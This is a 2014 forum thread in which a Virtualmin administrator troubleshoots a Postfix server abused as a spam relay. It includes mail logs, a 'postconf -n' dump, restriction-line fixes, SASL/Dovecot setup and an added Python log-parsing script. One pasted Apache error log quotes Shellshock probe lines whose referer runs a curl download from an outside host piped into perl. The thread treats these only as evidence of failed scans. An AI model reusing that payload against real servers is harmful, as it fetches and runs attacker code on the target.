[SOLVED] SMTP under attack. Help?

#1 Thu, 10/30/2014 - 16:51
remibruggeman

Hello,

For the last 3 days I have been the target of a cracker. The attack has so far used 3 known IP addresses:

iptables -I INPUT -s 108.178.61.228 -j DROP #spam
iptables -I INPUT -s 108.178.61.229 -j DROP #spam
iptables -I INPUT -s 198.143.132.2 -j DROP #spam
iptables -I INPUT -s 179.236.124.245 -j DROP #spam

The attacker sends e-mails from his server, uses my server as relay for my own domain and sends it out. I do not understand how the attacker can send e-mails without having to login over SMTP.

An extract from the mail log:

Oct 30 21:44:29 exalt2 postfix/qmgr[9692]: BD9BD58CB46F: from=<hbdbd5@MYDOMAIN.COM>, size=1220, nrcpt=10 (queue active)
Oct 30 21:44:29 exalt2 postfix/qmgr[9692]: 4B18E58DFCD4: removed
Oct 30 21:44:29 exalt2 postfix/qmgr[9692]: B733E58C411B: from=<yuehr@MYDOMAIN.COM>, size=1645, nrcpt=10 (queue active)
Oct 30 21:44:29 exalt2 postfix/qmgr[9692]: BC3D858CEB1D: from=<ztjg1ilt@MYDOMAIN.COM>, size=1111, nrcpt=10 (queue active)
Oct 30 21:44:29 exalt2 postfix/error[7917]: 3D29D58D0093: to=<aureliopereira22@hotmail.com>, relay=none, delay=181855, delays=181079/775/0/0.73, dsn=4.4.2, status=deferred (delivery temporarily suspended: lost connection with mx4.hotmail.com[65.54.188.126] while sending RCPT TO)
Oct 30 21:44:29 exalt2 postfix/error[7867]: 3A55158DC324: to=<luan.nextel@hotmail.com>, relay=none, delay=9889, delays=9113/775/0/0.93, dsn=4.4.2, status=deferred (delivery temporarily suspended: lost connection with mx4.hotmail.com[65.54.188.126] while sending RCPT TO)
Oct 30 21:44:29 exalt2 postfix/error[7369]: 36D2A58C839D: to=<eloina_f_silva@hotmail.com>, relay=none, delay=283587, delays=282811/774/0/1.5, dsn=4.4.2, status=deferred (delivery temporarily suspended: lost connection with mx4.hotmail.com[65.54.188.126] while sending RCPT TO)
Oct 30 21:44:29 exalt2 postfix/error[7360]: 3495958C8761: to=<mariasaraiva94@hotmail.com>, relay=none, delay=282674, delays=281898/775/0/0.55, dsn=4.4.2, status=deferred (delivery temporarily suspended: lost connection with mx4.hotmail.com[65.54.188.126] while sending RCPT TO)
Oct 30 21:44:29 exalt2 postfix/error[7392]: 3847E58D6CEB: to=<claysin_bts@hotmail.com>, relay=none, delay=106725, delays=105949/774/0/1.7, dsn=4.4.2, status=deferred (delivery temporarily suspended: lost connection with mx4.hotmail.com[65.54.188.126] while sending RCPT TO)
Oct 30 21:44:29 exalt2 postfix/error[7352]: 3C4DF59222C7: to=<marlon787@hotmail.com>, relay=none, delay=9625, delays=8849/775/0/1.1, dsn=4.4.2, status=deferred (delivery temporarily suspended: lost connection with mx4.hotmail.com[65.54.188.126] while sending RCPT TO)
Oct 30 21:44:29 exalt2 postfix/error[7868]: AACCA5940920: to=<elinewalc@hotmail.com>, relay=none, delay=777, delays=2.2/775/0/0.17, dsn=4.4.2, status=deferred (delivery temporarily suspended: lost connection with mx4.hotmail.com[65.54.188.126] while sending RCPT TO)
Oct 30 21:44:29 exalt2 postfix/error[7916]: C33515940921: to=<cris_sa@hotmail.com>, relay=none, delay=777, delays=2.4/775/0/0.17, dsn=4.4.2, status=deferred (delivery temporarily suspended: lost connection with mx4.hotmail.com[65.54.188.126] while sending RCPT TO)
Oct 30 21:44:29 exalt2 postfix/smtp[7616]: 368C6590406B: to=<mrmarina@uol.com.br>, relay=mx.uol.com.br[200.147.36.15]:25, conn_use=4, delay=33035, delays=32132/902/0.25/0.65, dsn=4.7.1, status=deferred (host mx.uol.com.br[200.147.36.15] said: 450 4.7.1 <mrmarina@uol.com.br>: Recipient address rejected: MX-UOL-04 - Too many messages, try again later. (in reply to RCPT TO command))
Oct 30 21:44:29 exalt2 postfix/qmgr[9692]: BD30358CF5A5: from=<a7zbsltj@MYDOMAIN.COM>, size=1160, nrcpt=10 (queue active)
Oct 30 21:44:29 exalt2 postfix/qmgr[9692]: BECAB5924EFE: from=<mxpny9yg@MYDOMAIN.COM>, size=1136, nrcpt=10 (queue active)
Oct 30 21:44:29 exalt2 postfix/smtpd[7903]: warning: restriction `permit_mynetworks' after `permit' is ignored

My server is already being blocked by several blocklists. I have made several changes to the settings and it seems that the attacker is unable to send e-mails now. But on the other hand, I am also unable to send e-mail.

My current biggest concerns are:
- What is impacted? Only Postfix, or might other systems be affected too?
- How can the attacker send without a username and password?
- How can I counter this?
- Are there any passwords I should change?
- Why can't I send? The current logs look like this:

Oct 30 22:43:59 exalt2 postfix/smtpd[18981]: NOQUEUE: reject: RCPT from unknown[179.236.124.245]: 450 4.7.1 Client host rejected: cannot find your hostname, [179.236.124.245]; from=<> to=<2ofdav@MYDOMAIN.COM> proto=SMTP helo=<MYDOMAIN.COM>
Oct 30 22:43:59 exalt2 postfix/smtpd[18981]: NOQUEUE: reject: RCPT from unknown[179.236.124.245]: 450 4.7.1 Client host rejected: cannot find your hostname, [179.236.124.245]; from=<> to=<2ofdav@MYDOMAIN.COM> proto=SMTP helo=<MYDOMAIN.COM>
Oct 30 22:44:00 exalt2 postfix/smtpd[18981]: NOQUEUE: reject: RCPT from unknown[179.236.124.245]: 450 4.7.1 Client host rejected: cannot find your hostname, [179.236.124.245]; from=<> to=<2ofdav@MYDOMAIN.COM> proto=SMTP helo=<MYDOMAIN.COM>
Oct 30 22:44:00 exalt2 postfix/smtpd[18981]: disconnect from unknown[179.236.124.245]
Oct 30 22:44:09 exalt2 postfix/smtpd[18309]: connect from static.240.54.251.148.clients.your-server.de[148.251.54.240]
Oct 30 22:44:09 exalt2 postfix/smtpd[18309]: disconnect from static.240.54.251.148.clients.your-server.de[148.251.54.240]
Oct 30 22:45:09 exalt2 postfix/smtpd[18309]: connect from static.240.54.251.148.clients.your-server.de[148.251.54.240]
Oct 30 22:45:09 exalt2 postfix/smtpd[18309]: disconnect from static.240.54.251.148.clients.your-server.de[148.251.54.240]
Oct 30 22:45:12 exalt2 postfix/smtpd[18981]: connect from MY.REVERSE.DOMAIN[my.home.ip]
Oct 30 22:45:13 exalt2 postfix/smtpd[18981]: warning: support for restriction "check_relay_domains" will be removed from Postfix; use "reject_unauth_destination" instead
Oct 30 22:45:13 exalt2 postfix/smtpd[18981]: NOQUEUE: reject: RCPT from MY.REVERSE.DOMAIN[my.home.ip]: 554 5.7.1 <XXXXXX@gmail.com>: Recipient address rejected: Relay access denied; from=<remi@MYDOMAIN.COM> to=<XXXXXX@gmail.com> proto=ESMTP helo=<[192.168.3.100]>
Oct 30 22:45:13 exalt2 postfix/smtpd[18981]: disconnect from MY.REVERSE.DOMAIN[my.home.ip]

Any help is greatly appreciated!

Thu, 10/30/2014 - 17:14
remibruggeman

At the moment I am not receiving logs anymore of spam being sent. The only thing I still see is this:

Oct 30 23:04:15 exalt2 postfix/smtpd[22637]: warning: 179.236.124.245: hostname 179236124245.user.veloxzone.com.br verification failed: Name or service not known
Oct 30 23:04:15 exalt2 postfix/smtpd[22637]: connect from unknown[179.236.124.245]
Oct 30 23:04:16 exalt2 postfix/smtpd[22637]: NOQUEUE: reject: RCPT from unknown[179.236.124.245]: 450 4.7.1 Client host rejected: cannot find your hostname, [179.236.124.245]; from=<> to=<2ofdav@MYDOMAIN.COM> proto=SMTP helo=<MYDOMAIN.COM>
Oct 30 23:04:16 exalt2 postfix/smtpd[22637]: NOQUEUE: reject: RCPT from unknown[179.236.124.245]: 450 4.7.1 Client host rejected: cannot find your hostname, [179.236.124.245]; from=<> to=<2ofdav@MYDOMAIN.COM> proto=SMTP helo=<MYDOMAIN.COM>
Oct 30 23:04:17 exalt2 postfix/smtpd[22637]: NOQUEUE: reject: RCPT from unknown[179.236.124.245]: 450 4.7.1 Client host rejected: cannot find your hostname, [179.236.124.245]; from=<> to=<2ofdav@MYDOMAIN.COM> proto=SMTP helo=<MYDOMAIN.COM>
Oct 30 23:04:17 exalt2 postfix/smtpd[22637]: disconnect from unknown[179.236.124.245]

I still do not understand, however, what I did that makes them unable to send. Does "Cannot find your hostname" mean that any user on my server without a hostname would also be refused? How likely is this? How can I still improve security?

Thu, 10/30/2014 - 17:25
remibruggeman

Is there a way I can easily activate the following option?

#relay_recipient_maps = hash:/etc/postfix/relay_recipients

If Virtualmin could dynamically add newly created mailboxes, that would be great ...

----edit

I found that there is such a list: /etc/postfix/virtual. I will enable the following in /etc/postfix/main.cf:

relay_recipient_maps = hash:/etc/postfix/virtual

Fri, 10/31/2014 - 10:31
andreychek

Howdy,

If you have any of those emails in your queue, you may want to review the email headers to get a better idea of what's going on and how they're getting in there.

It should not be possible to relay emails through your server, unless someone has guessed a password of one of your users.

Another option is that they could be accessing your server via a website containing a vulnerability of some sort.

What is the output of the command "postconf -n"? We can review that to see if there is anything unusual or insecure regarding your server's Postfix installation (feel free to edit out your actual domain names).

-Eric

Fri, 10/31/2014 - 15:26
remibruggeman

Hey Eric,

Thanks again for your reply. Is it possible for an attacker to get the password due to the recent poodlebleed technique? How can I verify with which account the attacker attempts to log in? I emptied the whole queue, so there are no more malicious e-mails in there, but I see I am still getting plenty of attempts, even though I blocked the IPs in iptables.

Oct 31 21:00:13 exalt2 postfix/smtpd[9920]: warning: 179.236.124.245: hostname 179236124245.user.veloxzone.com.br verification failed: Name or service not known
Oct 31 21:00:13 exalt2 postfix/smtpd[9920]: connect from unknown[179.236.124.245]
Oct 31 21:00:14 exalt2 postfix/smtpd[9920]: NOQUEUE: reject: RCPT from unknown[179.236.124.245]: 450 4.7.1 Client host rejected: cannot find your hostname, [179.236.124.245]; from=<> to=<2ofdav@MYDOMAIN.COM> proto=SMTP helo=<MYDOMAIN.COM>
Oct 31 21:00:14 exalt2 postfix/smtpd[9920]: NOQUEUE: reject: RCPT from unknown[179.236.124.245]: 450 4.7.1 Client host rejected: cannot find your hostname, [179.236.124.245]; from=<> to=<2ofdav@MYDOMAIN.COM> proto=SMTP helo=<MYDOMAIN.COM>
Oct 31 21:00:15 exalt2 postfix/smtpd[9920]: NOQUEUE: reject: RCPT from unknown[179.236.124.245]: 450 4.7.1 Client host rejected: cannot find your hostname, [179.236.124.245]; from=<> to=<2ofdav@MYDOMAIN.COM> proto=SMTP helo=<MYDOMAIN.COM>
Oct 31 21:00:15 exalt2 postfix/smtpd[9920]: disconnect from unknown[179.236.124.245]

In the secure log I see this a lot:

Oct 31 21:00:04 SERVER su: PAM unable to dlopen(/lib64/security/pam_fprintd.so): /lib64/security/pam_fprintd.so: cannot open shared object file: No such file or directory
Oct 31 21:00:04 SERVER su: PAM adding faulty module: /lib64/security/pam_fprintd.so
Oct 31 21:00:04 SERVER su: pam_unix(su:session): session opened for user postgres by (uid=0)
Oct 31 21:00:04 SERVER su: pam_unix(su:session): session closed for user postgres
Oct 31 21:00:04 SERVER su: PAM unable to dlopen(/lib64/security/pam_fprintd.so): /lib64/security/pam_fprintd.so: cannot open shared object file: No such file or directory
Oct 31 21:00:04 SERVER su: PAM adding faulty module: /lib64/security/pam_fprintd.so
Oct 31 21:00:04 SERVER su: pam_unix(su:session): session opened for user postgres by (uid=0)
Oct 31 21:00:04 SERVER su: pam_unix(su:session): session closed for user postgres

Could this be related?

In the apache logs I see no POSTs (is this logged by default?). I only see failed attacks:

[Sun Oct 26 23:54:42 2014] [error] [client 95.183.244.244] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /
[Mon Oct 27 00:58:49 2014] [error] [client 46.4.97.132] File does not exist: /var/www/html/cgi-sys, referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl
[Mon Oct 27 00:58:49 2014] [error] [client 46.4.97.132] File does not exist: /var/www/html/cgi-sys, referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl
[Mon Oct 27 00:58:49 2014] [error] [client 46.4.97.132] File does not exist: /var/www/html/xul, referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl
[Mon Oct 27 00:58:49 2014] [error] [client 46.4.97.132] script not found or unable to stat: /var/www/cgi-bin/status, referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl
[Mon Oct 27 07:51:39 2014] [error] [client 216.24.87.106] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /tmUnblock.cgi
[Mon Oct 27 17:55:39 2014] [error] [client 76.168.154.151] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /tmUnblock.cgi
[Mon Oct 27 21:16:18 2014] [error] [client 211.24.26.250] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /tmUnblock.cgi
[Mon Oct 27 22:47:17 2014] [error] [client 8.17.32.62] File does not exist: /var/www/html/recordings
[Tue Oct 28 02:43:12 2014] [error] [client 50.152.10.61] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /tmUnblock.cgi
[Tue Oct 28 03:51:09 2014] [error] [client 31.222.163.233] File does not exist: /var/www/html/cgi-bin-sdb, referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl
[Tue Oct 28 03:51:09 2014] [error] [client 31.222.163.233] File does not exist: /var/www/html/cgi-mod, referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl
[Tue Oct 28 03:51:09 2014] [error] [client 31.222.163.233] File does not exist: /var/www/html/cgi-sys, referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl
[Tue Oct 28 03:51:09 2014] [error] [client 31.222.163.233] File does not exist: /var/www/html/cgi-sys, referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl
body.xml:1: parser error : Document labelled UTF-16 but has UTF-8 content
<?xml version="1.0" encoding="utf-16" standalone="yes"?>
                                     ^
...
[Thu Oct 30 22:59:32 2014] [error] [client 125.64.35.67] File does not exist: /var/www/html/zc
[Thu Oct 30 23:04:26 2014] [error] [client 88.6.208.233] File does not exist: /var/www/html/riri
[Thu Oct 30 23:04:26 2014] [error] [client 88.6.208.233] File does not exist: /var/www/html/phpMyAdmin
[Thu Oct 30 23:04:26 2014] [error] [client 88.6.208.233] File does not exist: /var/www/html/pma
[Thu Oct 30 23:04:26 2014] [error] [client 88.6.208.233] File does not exist: /var/www/html/myadmin

(Isn't there a possibility to create an automated blocklist in iptables for IPs that attempt to execute files in the /var/www/html dir?)

The output:

 postconf -n
alias_database = hash:/etc/aliases
alias_maps = hash:/etc/aliases
allow_percent_hack = no
broken_sasl_auth_clients = yes
command_directory = /usr/sbin
config_directory = /etc/postfix
daemon_directory = /usr/libexec/postfix
data_directory = /var/lib/postfix
debug_peer_level = 2
disable_vrfy_command = yes
home_mailbox = Maildir/
html_directory = no
inet_interfaces = all
inet_protocols = ipv4
mail_owner = postfix
mailbox_command = /usr/bin/procmail-wrapper -o -a $DOMAIN -d $LOGNAME
mailbox_size_limit = 0
mailq_path = /usr/bin/mailq.postfix
manpage_directory = /usr/share/man
mydestination = $myhostname, localhost.$mydomain, localhost, MY.DOMAIN.COM
newaliases_path = /usr/bin/newaliases.postfix
queue_directory = /var/spool/postfix
readme_directory = /usr/share/doc/postfix-2.6.6/README_FILES
relay_recipient_maps = hash:/etc/postfix/virtual
sample_directory = /usr/share/doc/postfix-2.6.6/samples
sender_bcc_maps = hash:/etc/postfix/bcc
sendmail_path = /usr/sbin/sendmail.postfix
setgid_group = postdrop
smtpd_banner = smtp
smtpd_helo_required = yes
smtpd_recipient_restrictions = reject_rbl_client zen.spamhaus.org permit_mynetworks permit reject_unauth_destination
smtpd_sasl_auth_enable = yes
smtpd_sender_restrictions = reject_unknown_client reject_invalid_hostname reject_unknown_sender_domain
smtpd_tls_CAfile = /etc/postfix/postfix.ca.pem
smtpd_tls_auth_only = yes
smtpd_tls_cert_file = /etc/postfix/postfix.cert.pem
smtpd_tls_key_file = /etc/postfix/postfix.key.pem
smtpd_tls_mandatory_ciphers = high
smtpd_tls_mandatory_protocols = !SSLv2, !SSLv3
smtpd_tls_security_level = may
unknown_local_recipient_reject_code = 550
virtual_alias_maps = hash:/etc/postfix/virtual

Sat, 01/31/2015 - 12:24
Welshman

You have probably been hacked and had a file put on the server; I had a client recently with a footer.php file that suddenly appeared in a WP tinymce folder. Check the headers to see if you can find where the generated mail is coming from.

Chaos Reigns Within, Reflect, Repent and Reboot, Order Shall Return.

Sun, 11/02/2014 - 12:16
remibruggeman

Hello Welshman, it is possible, but I doubt it. The mails are being sent from another server to my SMTP server. The mails are not locally created. I am also running 2 file integrity checks: rkhunter, lmd and cfs. I had no messages, whereas I used to get these kinds of attacks, and they were spotted very rapidly...

Tue, 11/04/2014 - 13:10
remibruggeman

It's happening again :( These are the headers:

Mail headers:

Received: from TARWADAEX (mail.Sheffield.ae [91.73.219.154]) by MY.DOMAIN.COM (Postfix) with ESMTP id C167E58C06D8 for <joneslarry481@gmail.com>; Tue, 4 Nov 2014 18:23:03 +0100 (CET)
MIME-Version: 1.0
From: admin@goodservers.com
To: joneslarry481@gmail.com
Date: 4 Nov 2014 21:34:04 +0400
Subject: 144.76.127.234,mail,mail

The following showed in the logs:

Nov  4 19:58:03 exalt2 postfix/smtpd[15978]: connect from mail.tarwada.ae[91.73.219.154]
Nov  4 19:58:03 exalt2 postfix/smtpd[15978]: warning: restriction `reject_unauth_destination' after `permit' is ignored
Nov  4 19:58:04 exalt2 postfix/smtpd[15978]: 007D458C01BC: client=mail.tarwada.ae[91.73.219.154]
Nov  4 19:58:05 exalt2 postfix/smtpd[15996]: connect from mail.Sheffield.ae[91.73.219.154]
Nov  4 19:58:05 exalt2 postfix/smtpd[15996]: lost connection after CONNECT from mail.Sheffield.ae[91.73.219.154]
Nov  4 19:58:05 exalt2 postfix/smtpd[15996]: disconnect from mail.Sheffield.ae[91.73.219.154]
Nov  4 19:58:06 exalt2 postfix/smtpd[15996]: connect from mail.tarwada.ae[91.73.219.154]
Nov  4 19:58:07 exalt2 postfix/smtpd[15996]: warning: restriction `reject_unauth_destination' after `permit' is ignored
Nov  4 19:58:07 exalt2 postfix/smtpd[15996]: EAA2958C1317: client=mail.tarwada.ae[91.73.219.154]
Nov  4 19:58:09 exalt2 postfix/cleanup[16005]: EAA2958C1317: message-id=<>
Nov  4 19:58:09 exalt2 postfix/qmgr[31563]: EAA2958C1317: from=<admin@goodservers.com>, size=348, nrcpt=1 (queue active)
Nov  4 19:58:11 exalt2 postfix/smtp[16008]: EAA2958C1317: host gmail-smtp-in.l.google.com[64.233.161.27] said: 421-4.7.0 [XXX.XXX.XXX.XXX      15] Our system has detected an unusual rate of 421-4.7.0 unsolicited mail originating from your IP address. To protect our 421-4.7.0 users from spam, mail sent from your IP address has been temporarily 421-4.7.0 rate limited. Please visit 421-4.7.0 http://www.google.com/mail/help/bulk_mail.html to review our Bulk 421 4.7.0 Email Senders Guidelines. qi2si2225793lbb.47 - gsmtp (in reply to end of DATA command)
Nov  4 19:58:13 exalt2 postfix/smtp[16008]: EAA2958C1317: to=<joneslarry481@gmail.com>, relay=alt1.gmail-smtp-in.l.google.com[64.233.168.27]:25, delay=5.3, delays=1.6/0.01/2.6/1, dsn=4.7.0, status=deferred (host alt1.gmail-smtp-in.l.google.com[64.233.168.27] said: 421-4.7.0 [XXX.XXX.XXX.XXX      15] Our system has detected an unusual rate of 421-4.7.0 unsolicited mail originating from your IP address. To protect our 421-4.7.0 users from spam, mail sent from your IP address has been temporarily 421-4.7.0 rate limited. Please visit 421-4.7.0 http://www.google.com/mail/help/bulk_mail.html to review our Bulk 421 4.7.0 Email Senders Guidelines. pn6si1418211obb.17 - gsmtp (in reply to end of DATA command))
Nov  4 19:58:14 exalt2 postfix/cleanup[15995]: 007D458C01BC: message-id=<20141104225804.16907@localhost.localdomain>
Nov  4 19:58:14 exalt2 postfix/qmgr[31563]: 007D458C01BC: from=<admin@goodservers.com>, size=406, nrcpt=1 (queue active)
Nov  4 19:58:16 exalt2 postfix/smtp[16008]: 007D458C01BC: to=<joneslarry481@gmail.com>, relay=gmail-smtp-in.l.google.com[64.233.161.27]:25, delay=13, delays=11/0/0.17/2.1, dsn=2.0.0, status=sent (250 2.0.0 OK 1415127496 oi5si2023651lbb.135 - gsmtp)
Nov  4 19:58:16 exalt2 postfix/qmgr[31563]: 007D458C01BC: removed
Nov  4 19:58:56 exalt2 postfix/smtpd[15996]: disconnect from mail.tarwada.ae[91.73.219.154]
Nov  4 19:58:56 exalt2 postfix/smtpd[15978]: disconnect from mail.tarwada.ae[91.73.219.154]

I really need to stop these attacks. Any help is very welcome! How can they log in? How can they even send? I set the "Map for allowed addresses for relaying" to hash:/etc/postfix/virtual. This way it should only allow sending mail from e-mail accounts which were created on the mail server...
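One way to spot this kind of relaying in the mail log, as an added example that is not code from this thread or from Postfix: the script below joins the smtpd `client=` line (which only carries `sasl_username=` when the client authenticated), the qmgr `from=` line and the delivery `to=<...>, relay=` line by queue ID, and flags messages that an external, unauthenticated client had the server deliver to a foreign domain. The local domain, the mynetworks range and the sample log lines (modelled on the ones quoted above) are constructed assumptions.

```python
"""Find messages that Postfix relayed for clients that were neither on
mynetworks nor SASL-authenticated.

Added example, not from the thread and not part of Postfix. It joins three
line types seen in the thread's logs by queue ID: the smtpd "client=" line
(which carries sasl_username= only when the client authenticated), the qmgr
"from=" line, and the delivery "to=<...>, relay=" line.
"""
import ipaddress
import re

LOCAL_DOMAINS = {"mydomain.com"}                    # assumed stand-in for mydestination
MYNETWORKS = [ipaddress.ip_network("127.0.0.0/8")]  # assumed loopback-only mynetworks

CLIENT_RE = re.compile(
    r"postfix/smtpd\[\d+\]: (?P<qid>[0-9A-F]+): client=(?P<host>\S+?)\[(?P<ip>[^\]]+)\](?P<rest>.*)")
SASL_RE = re.compile(r"sasl_username=(?P<user>\S+)")
FROM_RE = re.compile(r"postfix/qmgr\[\d+\]: (?P<qid>[0-9A-F]+): from=<(?P<sender>[^>]*)>")
DELIVERY_RE = re.compile(
    r"postfix/(?:smtp|local)\[\d+\]: (?P<qid>[0-9A-F]+): to=<(?P<rcpt>[^>]+)>, relay=(?P<relay>[^,\s]+)")

# Constructed sample, modelled on the log lines quoted in this thread.
SAMPLE_LOG = """\
Nov  4 19:58:04 exalt2 postfix/smtpd[15978]: 007D458C01BC: client=mail.tarwada.ae[91.73.219.154]
Nov  4 19:58:14 exalt2 postfix/qmgr[31563]: 007D458C01BC: from=<admin@goodservers.com>, size=406, nrcpt=1 (queue active)
Nov  4 19:58:16 exalt2 postfix/smtp[16008]: 007D458C01BC: to=<joneslarry481@gmail.com>, relay=gmail-smtp-in.l.google.com[64.233.161.27]:25, dsn=2.0.0, status=sent (250 2.0.0 OK)
Nov  7 11:12:38 exalt2 postfix/smtpd[8307]: 5188B58C069E: client=localhost[127.0.0.1], sasl_method=LOGIN, sasl_username=username.virtualServerAccountName
Nov  7 11:12:38 exalt2 postfix/qmgr[8222]: 5188B58C069E: from=<username@MYDOMAIN.COM>, size=1414, nrcpt=1 (queue active)
Nov  7 11:12:39 exalt2 postfix/smtp[8587]: 5188B58C069E: to=<destination@gmail.com>, relay=gmail-smtp-in.l.google.com[173.194.65.26]:25, dsn=2.0.0, status=sent (250 2.0.0 OK)
Nov  7 12:00:00 exalt2 postfix/smtpd[8400]: AAAA11112222: client=mx.example.net[198.51.100.20]
Nov  7 12:00:00 exalt2 postfix/qmgr[8222]: AAAA11112222: from=<someone@example.net>, size=900, nrcpt=1 (queue active)
Nov  7 12:00:01 exalt2 postfix/local[8401]: AAAA11112222: to=<remi@mydomain.com>, relay=local, dsn=2.0.0, status=sent (delivered to maildir)
"""


def in_mynetworks(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in MYNETWORKS)


def find_relayed_messages(lines):
    """Return one record per (queue id, recipient) that an external,
    unauthenticated client had this server deliver to a foreign domain."""
    submissions, senders, seen, flagged = {}, {}, set(), []
    for line in lines:
        m = CLIENT_RE.search(line)
        if m:
            sasl = SASL_RE.search(m["rest"])
            submissions[m["qid"]] = {"host": m["host"], "ip": m["ip"],
                                     "sasl_user": sasl["user"] if sasl else None}
            continue
        m = FROM_RE.search(line)
        if m:
            senders[m["qid"]] = m["sender"]
            continue
        m = DELIVERY_RE.search(line)
        if not m or m["qid"] not in submissions or (m["qid"], m["rcpt"]) in seen:
            continue
        seen.add((m["qid"], m["rcpt"]))   # deferred retries log the same to= again
        sub = submissions[m["qid"]]
        rcpt_domain = m["rcpt"].rsplit("@", 1)[-1].lower()
        trusted = sub["sasl_user"] is not None or in_mynetworks(sub["ip"])
        if not trusted and rcpt_domain not in LOCAL_DOMAINS:
            flagged.append({"qid": m["qid"], "client": f"{sub['host']}[{sub['ip']}]",
                            "sender": senders.get(m["qid"], "?"), "rcpt": m["rcpt"],
                            "relay": m["relay"]})
    return flagged


if __name__ == "__main__":
    for hit in find_relayed_messages(SAMPLE_LOG.splitlines()):
        print(f"RELAYED {hit['qid']}: {hit['client']} sent <{hit['sender']}> "
              f"-> <{hit['rcpt']}> via {hit['relay']}")
```

Run it against /var/log/maillog with `find_relayed_messages(open(path))`; the webmail submission and the inbound message in the sample are not flagged, only the unauthenticated external one.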

Tue, 11/04/2014 - 13:30
remibruggeman

According to MX Toolbox, my Postfix 'might' be set up as an open relay. How can I make it a closed relay?

Tue, 11/04/2014 - 13:52
remibruggeman

I tried to add the following parameters to main.cf:

smtpd_sasl_security_options = noanonymous
smtpd_sasl_tls_security_options = noanonymous
smtpd_sasl_type = dovecot
smtpd_sender_restrictions = permit_sasl_authenticated

However, then I get the following error in the log:

Nov  4 20:45:42 exalt2 postfix/smtpd[21660]: warning: SASL: Connect to smtpd failed: No such file or directory
Nov  4 20:45:42 exalt2 postfix/smtpd[21660]: fatal: no SASL authentication mechanisms
Nov  4 20:45:43 exalt2 postfix/master[21629]: warning: process /usr/libexec/postfix/smtpd pid 21660 exit status 1
Nov  4 20:45:43 exalt2 postfix/master[21629]: warning: /usr/libexec/postfix/smtpd: bad command startup -- throttling

How should I interpret this? Is SASL not running or not configured? I am lost.

Tue, 11/04/2014 - 14:04
andreychek

What you may want to try is go back to a basic/standard "smtpd_recipient_restrictions" line, and see if that resolves the issue. If so, then you can make some tweaks to it to harden it up a bit. But I'm wondering if your current smtpd_recipient_restrictions line is allowing relaying through your system.

My suggestion would be to replace your current line with this one, and then restart Postfix:

smtpd_recipient_restrictions = permit_mynetworks permit_sasl_authenticated reject_unauth_destination

Tue, 11/04/2014 - 14:45
remibruggeman

Hey Eric,

My restrictions line is:

smtpd_recipient_restrictions = reject_rbl_client zen.spamhaus.org permit_mynetworks permit reject_unauth_destination permit_sasl_authenticated

I removed the "permit" but then I'm not allowed to send:

Nov  4 21:40:10 exalt2 postfix/smtpd[30289]: connect from XX.XX.XX.XX.access.reverse.ip[xx.xx.xx.xx]
Nov  4 21:40:11 exalt2 postfix/smtpd[30289]: NOQUEUE: reject: RCPT from XX.XX.XX.XX.access.reverse.ip[xx.xx.xx.xx]: 554 5.7.1 <destination@gmail.com>: Relay access denied; from=<origin@MYDOMAIN.COM> to=<destination@gmail.com> proto=ESMTP helo=<[192.168.3.100]>
Nov  4 21:40:11 exalt2 postfix/smtpd[30289]: disconnect from XX.XX.XX.XX.access.reverse.ip[xx.xx.xx.xx]

I don't see why the relay access has been denied though...

Fri, 11/07/2014 - 03:36
remibruggeman

Okay, I am a bit further now, I think. I removed the "permit" and I am still able to send from my webmail. SMTP does not work yet though. I noted there is no such file or directory: /var/spool/postfix/private/auth. The lowest I could go was /var/spool/postfix/private/. Could this be an indication of the problem?

Fri, 11/07/2014 - 04:20
remibruggeman

Great, so it appears I got SASL working with the following:

In /etc/dovecot/conf.d/10-master.conf, for the line

unix_listener private/auth

change it to

unix_listener /var/spool/postfix/private/auth

Restart dovecot and try again.

However, I am still having problems: I can send from the webmail, but it refuses to send from smtp. logs added:

##### via smtp:
Nov  7 11:11:56 exalt2 postfix/smtpd[8307]: connect from XX.XX.XX.XX.my.reverse.ip[XX.XX.XX.XX]
Nov  7 11:11:56 exalt2 postfix/smtpd[8307]: NOQUEUE: reject: RCPT from XX.XX.XX.XX.my.reverse.ip[XX.XX.XX.XX]: 554 5.7.1 <destination@gmail.com>: Recipient address rejected: Relay access denied; from=<username@MYDOMAIN.COM> to=<destination@gmail.com> proto=ESMTP helo=<[192.168.3.100]>
Nov  7 11:11:56 exalt2 postfix/smtpd[8307]: warning: restriction `permit_mynetworks' after `check_relay_domains' is ignored
Nov  7 11:11:56 exalt2 postfix/smtpd[8307]: disconnect from XX.XX.XX.XX.my.reverse.ip[XX.XX.XX.XX]
 
##### Via webmail:
Nov  7 11:12:38 exalt2 postfix/smtpd[8307]: connect from localhost[127.0.0.1]
Nov  7 11:12:38 exalt2 postfix/smtpd[8307]: warning: restriction `permit_mynetworks' after `check_relay_domains' is ignored
Nov  7 11:12:38 exalt2 postfix/smtpd[8307]: 5188B58C069E: client=localhost[127.0.0.1], sasl_method=LOGIN, sasl_username=username.virtualServerAccountName
Nov  7 11:12:38 exalt2 postfix/cleanup[8585]: 5188B58C069E: message-id=<b55cf923eff6614e0e255a9897dbfd0a@MYDOMAIN.COM>
Nov  7 11:12:38 exalt2 postfix/qmgr[8222]: 5188B58C069E: from=<username@MYDOMAIN.COM>, size=1414, nrcpt=1 (queue active)
Nov  7 11:12:38 exalt2 postfix/smtpd[8307]: disconnect from localhost[127.0.0.1]
Nov  7 11:12:39 exalt2 postfix/smtp[8587]: 5188B58C069E: to=<destination@gmail.com>, relay=gmail-smtp-in.l.google.com[173.194.65.26]:25, delay=1, delays=0.2/0.01/0.18/0.61, dsn=2.0.0, status=sent (250 2.0.0 OK 1415355159 wo10si14454591wjc.32 - gsmtp)
Nov  7 11:12:39 exalt2 postfix/qmgr[8222]: 5188B58C069E: removed

Fri, 11/07/2014 - 05:24
remibruggeman

Great. I found the problem.

